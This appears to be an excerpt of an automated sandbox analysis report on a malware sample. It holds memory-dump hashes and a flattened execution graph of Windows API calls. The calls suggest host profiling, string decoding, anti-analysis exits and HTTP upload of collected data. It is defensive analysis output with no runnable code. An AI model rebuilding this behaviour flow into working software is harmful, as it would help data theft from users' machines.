                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706073905.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_54a0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: &$N$_$}
                                                                                        • API String ID: 0-3709062931
                                                                                        • Opcode ID: 77516b3b53176c2eb7a33964c8727918a320577a17000c5ba6e02d2c82bb2796
                                                                                        • Instruction ID: dffcfbbf158601beb7d96726835a6c84693508ec5466ff4297787b19ce598e9d
                                                                                        • Opcode Fuzzy Hash: 77516b3b53176c2eb7a33964c8727918a320577a17000c5ba6e02d2c82bb2796
                                                                                        • Instruction Fuzzy Hash: 65F0BD71905B698BEBA5CF25DD4479BBAB1BB40341F1444E5D408E2680EB759AC5CE00
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706073905.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_54a0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ($*$*$|
                                                                                        • API String ID: 0-3299082222
                                                                                        • Opcode ID: c01615f3fdf0793d0544c530cdf147a2b24631bcd35bd7a8a7e44ecfc75a6b73
                                                                                        • Instruction ID: 809387423e3ee2c8c954cf4f6b537133a2dff02be210845e30a755df3513c04b
                                                                                        • Opcode Fuzzy Hash: c01615f3fdf0793d0544c530cdf147a2b24631bcd35bd7a8a7e44ecfc75a6b73
                                                                                        • Instruction Fuzzy Hash: B8E0ED71905228DBDBA0CF24E9887ED7AB1FB01345F1098D5D00CA7280DB796BC58F41

                                                                                        Execution Graph

                                                                                        Execution Coverage:3.9%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:4.4%
                                                                                        Total number of Nodes:2000
                                                                                        Total number of Limit Nodes:42
93234->93235 93236 41816b 6 API calls 93234->93236 93237 418204 9 API calls 93235->93237 93238 4182da 93235->93238 93236->93235 93237->93238 93239 4182e3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 93238->93239 93240 418357 93238->93240 93239->93240 93241 418360 GetProcAddress GetProcAddress 93240->93241 93242 41838b 93240->93242 93241->93242 93243 418394 GetProcAddress GetProcAddress 93242->93243 93244 4183bf 93242->93244 93243->93244 93245 4184b7 93244->93245 93246 4183cc 10 API calls 93244->93246 93247 4184c0 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 93245->93247 93248 41851c 93245->93248 93246->93245 93247->93248 93249 418525 GetProcAddress 93248->93249 93250 418538 93248->93250 93249->93250 93251 418541 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 93250->93251 93252 41859d 93250->93252 93251->93252 93253 4185b7 93252->93253 93254 4185a6 GetProcAddress 93252->93254 93253->92291 93254->93253 93256 411481 FindCloseChangeNotification 93255->93256 93257 411453 Process32Next 93255->93257 93256->92457 93257->93256 93258 411465 StrCmpCA 93257->93258 93258->93257 93259 41147a 93258->93259 93259->93257 94536 41b170 93260->94536 93262 41b236 93262->92465 93264 40f810 lstrcpyA 93263->93264 93265 410b97 93264->93265 93266 40f810 lstrcpyA 93265->93266 93267 410ba5 GetSystemTime 93266->93267 93268 410bc3 93267->93268 93268->92295 93271 40f96b 93269->93271 93270 40f993 93270->92312 93271->93270 93272 40f97f lstrcpyA lstrcatA 93271->93272 93272->93270 93274 40f850 lstrcpyA 93273->93274 93275 401090 93274->93275 93276 40f850 lstrcpyA 93275->93276 93277 40109c 93276->93277 93278 40f850 lstrcpyA 93277->93278 93279 4010a8 93278->93279 93280 40f850 lstrcpyA 93279->93280 93281 4010c0 93280->93281 93282 4139e0 93281->93282 93283 4139f2 93282->93283 93284 40f8a0 2 API calls 93283->93284 93285 413a0f 93284->93285 93286 40f8a0 2 API calls 93285->93286 93287 413a1c 93286->93287 93288 40f8a0 2 API calls 93287->93288 93289 
413a29 93288->93289 93290 40f810 lstrcpyA 93289->93290 93291 413a36 93290->93291 93292 40f810 lstrcpyA 93291->93292 93293 413a43 93292->93293 93294 40f810 lstrcpyA 93293->93294 93295 413a50 93294->93295 93296 40f810 lstrcpyA 93295->93296 93297 413a5d 93296->93297 93298 40f810 lstrcpyA 93297->93298 93299 413a6a 93298->93299 93300 40f810 lstrcpyA 93299->93300 93371 413a77 93300->93371 93301 401ee0 lstrcpyA 93301->93371 93302 401f40 lstrcpyA 93302->93371 93303 40f850 lstrcpyA 93303->93371 93304 413b46 StrCmpCA 93304->93371 93305 413ba9 StrCmpCA 93306 4141b8 93305->93306 93305->93371 93307 40f8f0 lstrcpyA 93306->93307 93308 4141c4 93307->93308 93309 401f00 lstrcpyA 93308->93309 93310 4141cd 93309->93310 93312 40f8f0 lstrcpyA 93310->93312 93311 413cf2 StrCmpCA 93313 414184 93311->93313 93311->93371 93314 4141d9 93312->93314 93316 40f8f0 lstrcpyA 93313->93316 94566 401fc0 lstrcpyA 93314->94566 93315 401f20 lstrcpyA 93315->93371 93317 414190 93316->93317 94562 401f00 93317->94562 93321 414114 93324 40f8f0 lstrcpyA 93321->93324 93322 413e3b StrCmpCA 93325 414150 93322->93325 93322->93371 93323 40f8f0 lstrcpyA 93326 4141a5 93323->93326 93327 4141f6 93324->93327 93328 40f8f0 lstrcpyA 93325->93328 94565 401fc0 lstrcpyA 93326->94565 93332 40f850 lstrcpyA 93327->93332 93329 41415c 93328->93329 94560 401f60 lstrcpyA 93329->94560 93333 41420c 93332->93333 93335 40f850 lstrcpyA 93333->93335 93334 414165 93337 40f8f0 lstrcpyA 93334->93337 93339 414218 93335->93339 93336 413f84 StrCmpCA 93340 414119 93336->93340 93336->93371 93338 414171 93337->93338 94561 401fe0 lstrcpyA 93338->94561 93342 40f850 lstrcpyA 93339->93342 93341 40f8f0 lstrcpyA 93340->93341 93347 414125 93341->93347 93370 414224 93342->93370 93343 412ee0 24 API calls 93343->93371 93344 401f60 lstrcpyA 93344->93371 93345 412fa0 29 API calls 93345->93371 93346 413c8f StrCmpCA 93346->93371 94558 401f60 lstrcpyA 93347->94558 93348 401f80 lstrcpyA 93348->93371 93351 401f00 lstrcpyA 93351->93371 93352 41412e 93354 40f8f0 
lstrcpyA 93352->93354 93353 4140c7 StrCmpCA 93355 4140e2 93353->93355 93356 4140d2 Sleep 93353->93356 93357 41413a 93354->93357 93358 40f8f0 lstrcpyA 93355->93358 93356->93371 94559 401fe0 lstrcpyA 93357->94559 93359 4140ee 93358->93359 94556 401f60 lstrcpyA 93359->94556 93360 413dd8 StrCmpCA 93360->93371 93363 4140f7 93364 40f8f0 lstrcpyA 93363->93364 93365 414103 93364->93365 94557 401f60 lstrcpyA 93365->94557 93366 413f21 StrCmpCA 93366->93371 93367 401080 lstrcpyA 93367->93371 93369 41406a StrCmpCA 93369->93371 93370->92325 93371->93301 93371->93302 93371->93303 93371->93304 93371->93305 93371->93311 93371->93315 93371->93322 93371->93336 93371->93343 93371->93344 93371->93345 93371->93346 93371->93348 93371->93351 93371->93353 93371->93360 93371->93366 93371->93367 93371->93369 93372 40f8f0 lstrcpyA 93371->93372 93372->93371 93374 40f867 93373->93374 93375 40f87e 93374->93375 93376 40f876 lstrcpyA 93374->93376 93375->92351 93376->93375 93377->92370 93379 410446 93378->93379 93380 41044d GetVolumeInformationA 93378->93380 93379->93380 93381 410484 93380->93381 93382 4104b8 GetProcessHeap HeapAlloc 93381->93382 93383 4104d2 93382->93383 93384 4104e4 wsprintfA lstrcatA GetCurrentHwProfileA 93382->93384 93385 40f810 lstrcpyA 93383->93385 93386 41051f 93384->93386 93387 4104dd 93385->93387 93388 40f810 lstrcpyA 93386->93388 93387->92383 93389 410535 93388->93389 93390 41053d lstrlenA 93389->93390 93391 410552 93390->93391 94567 411200 lstrcpyA malloc strncpy 93391->94567 93393 41055c 93394 410566 lstrcatA 93393->93394 93395 410576 93394->93395 93396 40f810 lstrcpyA 93395->93396 93397 410589 93396->93397 93397->92383 93399 40f850 lstrcpyA 93398->93399 93400 403e3a 93399->93400 94568 403d70 93400->94568 93402 403e46 93403 40f810 lstrcpyA 93402->93403 93404 403e67 93403->93404 93405 40f810 lstrcpyA 93404->93405 93406 403e74 93405->93406 93407 40f810 lstrcpyA 93406->93407 93408 403e81 93407->93408 93409 40f810 lstrcpyA 93408->93409 93410 403e8e 93409->93410 93411 
40f810 lstrcpyA 93410->93411 93412 403e9b 93411->93412 93413 403eab InternetOpenA StrCmpCA 93412->93413 93414 403ed1 93413->93414 93415 404370 InternetCloseHandle 93414->93415 93416 410b80 2 API calls 93414->93416 93428 404382 93415->93428 93417 403ee7 93416->93417 93418 40f940 2 API calls 93417->93418 93419 403ef7 93418->93419 93420 40f8f0 lstrcpyA 93419->93420 93421 403f00 93420->93421 93422 40f9a0 3 API calls 93421->93422 93423 403f21 93422->93423 93424 40f8f0 lstrcpyA 93423->93424 93425 403f2a 93424->93425 93426 40f9a0 3 API calls 93425->93426 93427 403f43 93426->93427 93429 40f8f0 lstrcpyA 93427->93429 93428->92389 93430 403f4c 93429->93430 93431 40f940 2 API calls 93430->93431 93432 403f64 93431->93432 93433 40f8f0 lstrcpyA 93432->93433 93434 403f6d 93433->93434 93435 40f9a0 3 API calls 93434->93435 93436 403f86 93435->93436 93437 40f8f0 lstrcpyA 93436->93437 93438 403f8f 93437->93438 93439 40f9a0 3 API calls 93438->93439 93440 403fa8 93439->93440 93441 40f8f0 lstrcpyA 93440->93441 93442 403fb1 93441->93442 93443 40f9a0 3 API calls 93442->93443 93444 403fd4 93443->93444 93445 40f940 2 API calls 93444->93445 93446 403fdb 93445->93446 93447 40f8f0 lstrcpyA 93446->93447 93448 403fe4 93447->93448 93449 403ff4 InternetConnectA 93448->93449 93449->93415 93450 404020 HttpOpenRequestA 93449->93450 93451 404363 InternetCloseHandle 93450->93451 93452 404058 93450->93452 93451->93415 93453 404072 93452->93453 93454 40405c InternetSetOptionA 93452->93454 93455 40f9a0 3 API calls 93453->93455 93454->93453 93456 404083 93455->93456 93457 40f8f0 lstrcpyA 93456->93457 93458 40408c 93457->93458 93459 40f940 2 API calls 93458->93459 93460 4040a4 93459->93460 93461 40f8f0 lstrcpyA 93460->93461 93462 4040ad 93461->93462 93463 40f9a0 3 API calls 93462->93463 93464 4040c6 93463->93464 93465 40f8f0 lstrcpyA 93464->93465 93466 4040cf 93465->93466 93467 40f9a0 3 API calls 93466->93467 93468 4040e9 93467->93468 93469 40f8f0 lstrcpyA 93468->93469 93470 4040f2 93469->93470 93471 40f9a0 
3 API calls 93470->93471 93472 40410b 93471->93472 93473 40f8f0 lstrcpyA 93472->93473 93474 404114 93473->93474 93475 40f9a0 3 API calls 93474->93475 93476 40412d 93475->93476 93477 40f8f0 lstrcpyA 93476->93477 93478 404136 93477->93478 93479 40f940 2 API calls 93478->93479 93480 40414e 93479->93480 93481 40f8f0 lstrcpyA 93480->93481 93482 404157 93481->93482 93483 40f9a0 3 API calls 93482->93483 93484 404170 93483->93484 93485 40f8f0 lstrcpyA 93484->93485 93486 404179 93485->93486 93487 40f9a0 3 API calls 93486->93487 93488 404192 93487->93488 93489 40f8f0 lstrcpyA 93488->93489 93490 40419b 93489->93490 93491 40f940 2 API calls 93490->93491 93492 4041b3 93491->93492 93493 40f8f0 lstrcpyA 93492->93493 93494 4041bc 93493->93494 93495 40f9a0 3 API calls 93494->93495 93496 4041d5 93495->93496 93497 40f8f0 lstrcpyA 93496->93497 93498 4041de 93497->93498 93499 40f9a0 3 API calls 93498->93499 93500 4041f9 93499->93500 93501 40f8f0 lstrcpyA 93500->93501 93502 404202 93501->93502 93503 40f9a0 3 API calls 93502->93503 93504 40421b 93503->93504 93505 40f8f0 lstrcpyA 93504->93505 93506 404224 93505->93506 93507 40f9a0 3 API calls 93506->93507 93508 40423d 93507->93508 93509 40f8f0 lstrcpyA 93508->93509 93510 404246 93509->93510 93511 40f940 2 API calls 93510->93511 93512 40425e 93511->93512 93513 40f8f0 lstrcpyA 93512->93513 93514 404267 93513->93514 93515 40f810 lstrcpyA 93514->93515 93516 40427c 93515->93516 93517 40f940 2 API calls 93516->93517 93518 404294 93517->93518 93519 40f940 2 API calls 93518->93519 93520 40429b 93519->93520 93521 40f8f0 lstrcpyA 93520->93521 93522 4042a4 93521->93522 93523 4042bc lstrlenA 93522->93523 93524 4042cc 93523->93524 93525 4042d5 lstrlenA 93524->93525 94576 40fa50 93525->94576 93527 4042e5 HttpSendRequestA InternetReadFile 93528 404354 InternetCloseHandle 93527->93528 93529 404308 93527->93529 94577 40f890 93528->94577 93529->93528 93530 40430f 93529->93530 93532 40f9a0 3 API calls 93530->93532 93533 40f8f0 lstrcpyA 93530->93533 93534 
404339 InternetReadFile 93530->93534 93532->93530 93533->93530 93534->93528 93534->93529 94581 40fa50 93535->94581 93537 41240c StrCmpCA 93538 412417 ExitProcess 93537->93538 93539 41241e 93537->93539 93540 41242e strtok_s 93539->93540 93541 412587 93540->93541 93554 41243f 93540->93554 93541->92392 93542 41256b strtok_s 93542->93541 93542->93554 93543 412460 StrCmpCA 93543->93542 93543->93554 93544 4124f3 StrCmpCA 93544->93542 93544->93554 93545 412533 StrCmpCA 93545->93542 93546 4124b4 StrCmpCA 93546->93542 93546->93554 93547 412557 StrCmpCA 93547->93542 93548 412498 StrCmpCA 93548->93542 93548->93554 93549 412508 StrCmpCA 93549->93542 93549->93554 93550 41251d StrCmpCA 93550->93542 93551 41247c StrCmpCA 93551->93542 93551->93554 93552 4124de StrCmpCA 93552->93542 93552->93554 93553 40f8a0 2 API calls 93553->93554 93554->93542 93554->93543 93554->93544 93554->93545 93554->93546 93554->93547 93554->93548 93554->93549 93554->93550 93554->93551 93554->93552 93554->93553 93556 40f850 lstrcpyA 93555->93556 93557 405bca 93556->93557 93558 403d70 5 API calls 93557->93558 93559 405bd6 93558->93559 93560 40f810 lstrcpyA 93559->93560 93561 405bf7 93560->93561 93562 40f810 lstrcpyA 93561->93562 93563 405c04 93562->93563 93564 40f810 lstrcpyA 93563->93564 93565 405c11 93564->93565 93566 40f810 lstrcpyA 93565->93566 93567 405c1e 93566->93567 93568 40f810 lstrcpyA 93567->93568 93569 405c2b 93568->93569 93570 405c3b InternetOpenA StrCmpCA 93569->93570 93571 405c61 93570->93571 93572 406246 InternetCloseHandle 93571->93572 93574 410b80 2 API calls 93571->93574 93573 40625c 93572->93573 94588 406cd0 CryptStringToBinaryA 93573->94588 93575 405c77 93574->93575 93577 40f940 2 API calls 93575->93577 93578 405c87 93577->93578 93580 40f8f0 lstrcpyA 93578->93580 93579 406262 93581 40f8a0 2 API calls 93579->93581 93598 40628c 93579->93598 93585 405c90 93580->93585 93582 406275 93581->93582 93583 40f9a0 3 API calls 93582->93583 93584 406284 93583->93584 93586 40f8f0 lstrcpyA 93584->93586 
93587 40f9a0 3 API calls 93585->93587 93586->93598 93588 405cb1 93587->93588 93589 40f8f0 lstrcpyA 93588->93589 93590 405cba 93589->93590 93591 40f9a0 3 API calls 93590->93591 93592 405cd3 93591->93592 93593 40f8f0 lstrcpyA 93592->93593 93594 405cdc 93593->93594 93595 40f940 2 API calls 93594->93595 93596 405cf4 93595->93596 93597 40f8f0 lstrcpyA 93596->93597 93599 405cfd 93597->93599 93598->92403 93600 40f9a0 3 API calls 93599->93600 93601 405d16 93600->93601 93602 40f8f0 lstrcpyA 93601->93602 93603 405d1f 93602->93603 93604 40f9a0 3 API calls 93603->93604 93605 405d38 93604->93605 93606 40f8f0 lstrcpyA 93605->93606 93607 405d41 93606->93607 93608 40f9a0 3 API calls 93607->93608 93609 405d64 93608->93609 93610 40f940 2 API calls 93609->93610 93611 405d6b 93610->93611 93612 40f8f0 lstrcpyA 93611->93612 93613 405d74 93612->93613 93614 405d84 InternetConnectA 93613->93614 93615 405db0 HttpOpenRequestA 93614->93615 93616 406243 93614->93616 93617 406239 InternetCloseHandle 93615->93617 93618 405de9 93615->93618 93616->93572 93617->93616 93619 405e03 93618->93619 93620 405ded InternetSetOptionA 93618->93620 93621 40f9a0 3 API calls 93619->93621 93620->93619 93622 405e14 93621->93622 93623 40f8f0 lstrcpyA 93622->93623 93624 405e1d 93623->93624 93625 40f940 2 API calls 93624->93625 93626 405e35 93625->93626 93627 40f8f0 lstrcpyA 93626->93627 93628 405e3e 93627->93628 93629 40f9a0 3 API calls 93628->93629 93630 405e57 93629->93630 93631 40f8f0 lstrcpyA 93630->93631 93632 405e60 93631->93632 93633 40f9a0 3 API calls 93632->93633 93634 405e7b 93633->93634 93635 40f8f0 lstrcpyA 93634->93635 93636 405e84 93635->93636 93637 40f9a0 3 API calls 93636->93637 93638 405e9f 93637->93638 93639 40f8f0 lstrcpyA 93638->93639 93640 405ea8 93639->93640 93641 40f9a0 3 API calls 93640->93641 93642 405ec1 93641->93642 93643 40f8f0 lstrcpyA 93642->93643 93644 405eca 93643->93644 93645 40f940 2 API calls 93644->93645 93646 405ee2 93645->93646 93647 40f8f0 lstrcpyA 93646->93647 93648 405eeb 
93647->93648 93649 40f9a0 3 API calls 93648->93649 93650 405f04 93649->93650 93651 40f8f0 lstrcpyA 93650->93651 93652 405f0d 93651->93652 93653 40f9a0 3 API calls 93652->93653 93654 405f26 93653->93654 93655 40f8f0 lstrcpyA 93654->93655 93656 405f2f 93655->93656 93657 40f940 2 API calls 93656->93657 93658 405f47 93657->93658 93659 40f8f0 lstrcpyA 93658->93659 93660 405f50 93659->93660 93661 40f9a0 3 API calls 93660->93661 93662 405f69 93661->93662 93663 40f8f0 lstrcpyA 93662->93663 93664 405f72 93663->93664 93665 40f9a0 3 API calls 93664->93665 93666 405f8d 93665->93666 93667 40f8f0 lstrcpyA 93666->93667 93668 405f96 93667->93668 93669 40f9a0 3 API calls 93668->93669 93670 405faf 93669->93670 93671 40f8f0 lstrcpyA 93670->93671 93672 405fb8 93671->93672 93673 40f9a0 3 API calls 93672->93673 93674 405fd1 93673->93674 93675 40f8f0 lstrcpyA 93674->93675 93676 405fda 93675->93676 93677 40f9a0 3 API calls 93676->93677 93678 405ff4 93677->93678 93679 40f8f0 lstrcpyA 93678->93679 93680 405ffd 93679->93680 93681 40f9a0 3 API calls 93680->93681 93682 406016 93681->93682 93683 40f8f0 lstrcpyA 93682->93683 93684 40601f 93683->93684 93685 40f9a0 3 API calls 93684->93685 93686 406038 93685->93686 93687 40f8f0 lstrcpyA 93686->93687 93688 406041 93687->93688 93689 40f940 2 API calls 93688->93689 93690 406059 93689->93690 93691 40f8f0 lstrcpyA 93690->93691 93692 406062 93691->93692 93693 40f9a0 3 API calls 93692->93693 93694 40607b 93693->93694 93695 40f8f0 lstrcpyA 93694->93695 93696 406084 93695->93696 93697 40f9a0 3 API calls 93696->93697 93698 40609e 93697->93698 93699 40f8f0 lstrcpyA 93698->93699 93700 4060a7 93699->93700 93701 40f9a0 3 API calls 93700->93701 93702 4060c0 93701->93702 93703 40f8f0 lstrcpyA 93702->93703 93704 4060c9 93703->93704 93705 40f9a0 3 API calls 93704->93705 93706 4060e2 93705->93706 93707 40f8f0 lstrcpyA 93706->93707 93708 4060eb 93707->93708 93709 40f940 2 API calls 93708->93709 93710 406103 93709->93710 93711 40f8f0 lstrcpyA 93710->93711 93712 40610c 
93711->93712 93713 40611c lstrlenA 93712->93713 94582 40fa50 93713->94582 93715 40612d lstrlenA GetProcessHeap HeapAlloc 94583 40fa50 93715->94583 93717 406150 lstrlenA 94584 40fa50 93717->94584 93719 406160 memcpy 94585 40fa50 93719->94585 93721 406172 lstrlenA 93722 406182 93721->93722 93723 40618b lstrlenA memcpy 93722->93723 94586 40fa50 93723->94586 93725 4061a7 lstrlenA 94587 40fa50 93725->94587 93727 4061b7 HttpSendRequestA InternetReadFile 93728 40622f InternetCloseHandle 93727->93728 93731 4061da 93727->93731 93728->93617 93729 40f9a0 3 API calls 93729->93731 93730 40f8f0 lstrcpyA 93730->93731 93731->93728 93731->93729 93731->93730 93732 406214 InternetReadFile 93731->93732 93732->93728 93732->93731 94593 40fa50 93733->94593 93735 411e83 strtok_s 93736 411eed 93735->93736 93737 411e90 93735->93737 93736->92406 93738 411ed6 strtok_s 93737->93738 93739 40f8a0 2 API calls 93737->93739 93740 40f8a0 2 API calls 93737->93740 93738->93736 93738->93737 93739->93738 93740->93737 94594 40fa50 93741->94594 93743 411c23 strtok_s 93744 411d4d 93743->93744 93748 411c34 93743->93748 93744->92419 93745 411d32 strtok_s 93745->93744 93745->93748 93746 411d04 StrCmpCA 93746->93748 93747 411c66 StrCmpCA 93747->93748 93748->93745 93748->93746 93748->93747 93749 411cd8 StrCmpCA 93748->93749 93750 411cac StrCmpCA 93748->93750 93751 40f8a0 lstrlenA lstrcpyA 93748->93751 93749->93748 93750->93748 93751->93748 94595 40fa50 93752->94595 93754 411da3 strtok_s 93755 411e51 93754->93755 93758 411db4 93754->93758 93755->92433 93756 40f8a0 2 API calls 93759 411e36 strtok_s 93756->93759 93757 411de8 StrCmpCA 93757->93758 93758->93756 93758->93757 93758->93759 93760 40f8a0 2 API calls 93758->93760 93759->93755 93759->93758 93760->93758 93762 40f810 lstrcpyA 93761->93762 93763 4144c3 93762->93763 93764 40f9a0 3 API calls 93763->93764 93765 4144d4 93764->93765 93766 40f8f0 lstrcpyA 93765->93766 93767 4144dd 93766->93767 93768 40f9a0 3 API calls 93767->93768 93769 4144f7 93768->93769 93770 
40f8f0 lstrcpyA 93769->93770 93771 414500 93770->93771 93772 40f9a0 3 API calls 93771->93772 93773 414519 93772->93773 93774 40f8f0 lstrcpyA 93773->93774 93775 414522 93774->93775 93776 40f9a0 3 API calls 93775->93776 93777 41453b 93776->93777 93778 40f8f0 lstrcpyA 93777->93778 93779 414544 93778->93779 93780 40f9a0 3 API calls 93779->93780 93781 41455d 93780->93781 93782 40f8f0 lstrcpyA 93781->93782 93783 414566 93782->93783 94596 40fb60 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 93783->94596 93785 414573 93786 40f9a0 3 API calls 93785->93786 93787 414580 93786->93787 93788 40f8f0 lstrcpyA 93787->93788 93789 414589 93788->93789 93790 40f9a0 3 API calls 93789->93790 93791 4145a2 93790->93791 93792 40f8f0 lstrcpyA 93791->93792 93793 4145ab 93792->93793 93794 40f9a0 3 API calls 93793->93794 93795 4145c4 93794->93795 93796 40f8f0 lstrcpyA 93795->93796 93797 4145cd 93796->93797 94597 410340 memset RegOpenKeyExA 93797->94597 93799 4145da 93800 40f9a0 3 API calls 93799->93800 93801 4145e7 93800->93801 93802 40f8f0 lstrcpyA 93801->93802 93803 4145f0 93802->93803 93804 40f9a0 3 API calls 93803->93804 93805 414609 93804->93805 93806 40f8f0 lstrcpyA 93805->93806 93807 414612 93806->93807 93808 40f9a0 3 API calls 93807->93808 93809 41462b 93808->93809 93810 40f8f0 lstrcpyA 93809->93810 93811 414634 93810->93811 94600 4103e0 GetCurrentHwProfileA 93811->94600 93813 414645 93814 40f940 2 API calls 93813->93814 93815 414655 93814->93815 93816 40f8f0 lstrcpyA 93815->93816 93817 41465e 93816->93817 93818 40f9a0 3 API calls 93817->93818 93819 41467f 93818->93819 93820 40f8f0 lstrcpyA 93819->93820 93821 414688 93820->93821 93822 40f9a0 3 API calls 93821->93822 93823 4146a1 93822->93823 93824 40f8f0 lstrcpyA 93823->93824 93825 4146aa 93824->93825 93826 410420 12 API calls 93825->93826 93827 4146bb 93826->93827 93828 40f940 2 API calls 93827->93828 93829 4146cb 93828->93829 93830 40f8f0 lstrcpyA 93829->93830 93831 4146d4 93830->93831 93832 40f9a0 3 API calls 93831->93832 93833 
4146f5 93832->93833 93834 40f8f0 lstrcpyA 93833->93834 93835 4146fe 93834->93835 93836 40f9a0 3 API calls 93835->93836 93837 414717 93836->93837 93838 40f8f0 lstrcpyA 93837->93838 93839 414720 93838->93839 93840 414728 GetCurrentProcessId 93839->93840 94607 411090 OpenProcess 93840->94607 93843 40f940 2 API calls 93844 414748 93843->93844 93845 40f8f0 lstrcpyA 93844->93845 93846 414751 93845->93846 93847 40f9a0 3 API calls 93846->93847 93848 414772 93847->93848 93849 40f8f0 lstrcpyA 93848->93849 93850 41477b 93849->93850 93851 40f9a0 3 API calls 93850->93851 93852 414794 93851->93852 93853 40f8f0 lstrcpyA 93852->93853 93854 41479d 93853->93854 93855 40f9a0 3 API calls 93854->93855 93856 4147b6 93855->93856 93857 40f8f0 lstrcpyA 93856->93857 93858 4147bf 93857->93858 93859 40f9a0 3 API calls 93858->93859 93860 4147d8 93859->93860 93861 40f8f0 lstrcpyA 93860->93861 93862 4147e1 93861->93862 94612 4105a0 GetProcessHeap HeapAlloc 93862->94612 93864 4147ee 93865 40f9a0 3 API calls 93864->93865 93866 4147fb 93865->93866 93867 40f8f0 lstrcpyA 93866->93867 93868 414804 93867->93868 93869 40f9a0 3 API calls 93868->93869 93870 41481d 93869->93870 93871 40f8f0 lstrcpyA 93870->93871 93872 414826 93871->93872 93873 40f9a0 3 API calls 93872->93873 93874 41483f 93873->93874 93875 40f8f0 lstrcpyA 93874->93875 93876 414848 93875->93876 94619 410730 CoInitializeEx CoInitializeSecurity CoCreateInstance 93876->94619 93878 414859 93879 40f940 2 API calls 93878->93879 93880 414869 93879->93880 93881 40f8f0 lstrcpyA 93880->93881 93882 414872 93881->93882 93883 40f9a0 3 API calls 93882->93883 93884 414893 93883->93884 93885 40f8f0 lstrcpyA 93884->93885 93886 41489c 93885->93886 93887 40f9a0 3 API calls 93886->93887 93888 4148b5 93887->93888 93889 40f8f0 lstrcpyA 93888->93889 93890 4148be 93889->93890 94632 410900 CoInitializeEx CoInitializeSecurity CoCreateInstance 93890->94632 93892 4148cf 93893 40f940 2 API calls 93892->93893 93894 4148df 93893->93894 93895 40f8f0 lstrcpyA 93894->93895 
93896 4148e8 93895->93896 93897 40f9a0 3 API calls 93896->93897 93898 414909 93897->93898 93899 40f8f0 lstrcpyA 93898->93899 93900 414912 93899->93900 93901 40f9a0 3 API calls 93900->93901 93902 41492b 93901->93902 93903 40f8f0 lstrcpyA 93902->93903 93904 414934 93903->93904 94645 40fb20 GetProcessHeap HeapAlloc GetComputerNameA 93904->94645 93907 40f9a0 3 API calls 93908 41494e 93907->93908 93909 40f8f0 lstrcpyA 93908->93909 93910 414957 93909->93910 93911 40f9a0 3 API calls 93910->93911 93912 414970 93911->93912 93913 40f8f0 lstrcpyA 93912->93913 93914 414979 93913->93914 93915 40f9a0 3 API calls 93914->93915 93916 414992 93915->93916 93917 40f8f0 lstrcpyA 93916->93917 93918 41499b 93917->93918 94647 40fae0 GetProcessHeap HeapAlloc GetUserNameA 93918->94647 93920 4149a8 93921 40f9a0 3 API calls 93920->93921 93922 4149b5 93921->93922 93923 40f8f0 lstrcpyA 93922->93923 93924 4149be 93923->93924 93925 40f9a0 3 API calls 93924->93925 93926 4149d7 93925->93926 93927 40f8f0 lstrcpyA 93926->93927 93928 4149e0 93927->93928 93929 40f9a0 3 API calls 93928->93929 93930 4149f9 93929->93930 93931 40f8f0 lstrcpyA 93930->93931 93932 414a02 93931->93932 94648 4102c0 7 API calls 93932->94648 93935 40f940 2 API calls 93936 414a23 93935->93936 93937 40f8f0 lstrcpyA 93936->93937 93938 414a2c 93937->93938 93939 40f9a0 3 API calls 93938->93939 93940 414a4d 93939->93940 93941 40f8f0 lstrcpyA 93940->93941 93942 414a56 93941->93942 93943 40f9a0 3 API calls 93942->93943 93944 414a6f 93943->93944 93945 40f8f0 lstrcpyA 93944->93945 93946 414a78 93945->93946 94651 40fc30 93946->94651 93949 40f940 2 API calls 93950 414a99 93949->93950 93951 40f8f0 lstrcpyA 93950->93951 93952 414aa2 93951->93952 93953 40f9a0 3 API calls 93952->93953 93954 414ac3 93953->93954 93955 40f8f0 lstrcpyA 93954->93955 93956 414acc 93955->93956 93957 40f9a0 3 API calls 93956->93957 93958 414ae5 93957->93958 93959 40f8f0 lstrcpyA 93958->93959 93960 414aee 93959->93960 94661 40fb60 GetProcessHeap HeapAlloc GetLocalTime 
wsprintfA 93960->94661 93962 414afb 93963 40f9a0 3 API calls 93962->93963 93964 414b08 93963->93964 93965 40f8f0 lstrcpyA 93964->93965 93966 414b11 93965->93966 93967 40f9a0 3 API calls 93966->93967 93968 414b2a 93967->93968 93969 40f8f0 lstrcpyA 93968->93969 93970 414b33 93969->93970 93971 40f9a0 3 API calls 93970->93971 93972 414b4c 93971->93972 93973 40f8f0 lstrcpyA 93972->93973 93974 414b55 93973->93974 94662 40fbc0 GetProcessHeap HeapAlloc GetTimeZoneInformation 93974->94662 93977 40f9a0 3 API calls 93978 414b6f 93977->93978 93979 40f8f0 lstrcpyA 93978->93979 93980 414b78 93979->93980 93981 40f9a0 3 API calls 93980->93981 93982 414b91 93981->93982 93983 40f8f0 lstrcpyA 93982->93983 93984 414b9a 93983->93984 93985 40f9a0 3 API calls 93984->93985 93986 414bb3 93985->93986 93987 40f8f0 lstrcpyA 93986->93987 93988 414bbc 93987->93988 93989 40f9a0 3 API calls 93988->93989 93990 414bd5 93989->93990 93991 40f8f0 lstrcpyA 93990->93991 93992 414bde 93991->93992 94665 40fd30 GetProcessHeap HeapAlloc RegOpenKeyExA 93992->94665 93994 414beb 93995 40f9a0 3 API calls 93994->93995 93996 414bf8 93995->93996 93997 40f8f0 lstrcpyA 93996->93997 93998 414c01 93997->93998 93999 40f9a0 3 API calls 93998->93999 94000 414c1a 93999->94000 94001 40f8f0 lstrcpyA 94000->94001 94002 414c23 94001->94002 94003 40f9a0 3 API calls 94002->94003 94004 414c3c 94003->94004 94005 40f8f0 lstrcpyA 94004->94005 94006 414c45 94005->94006 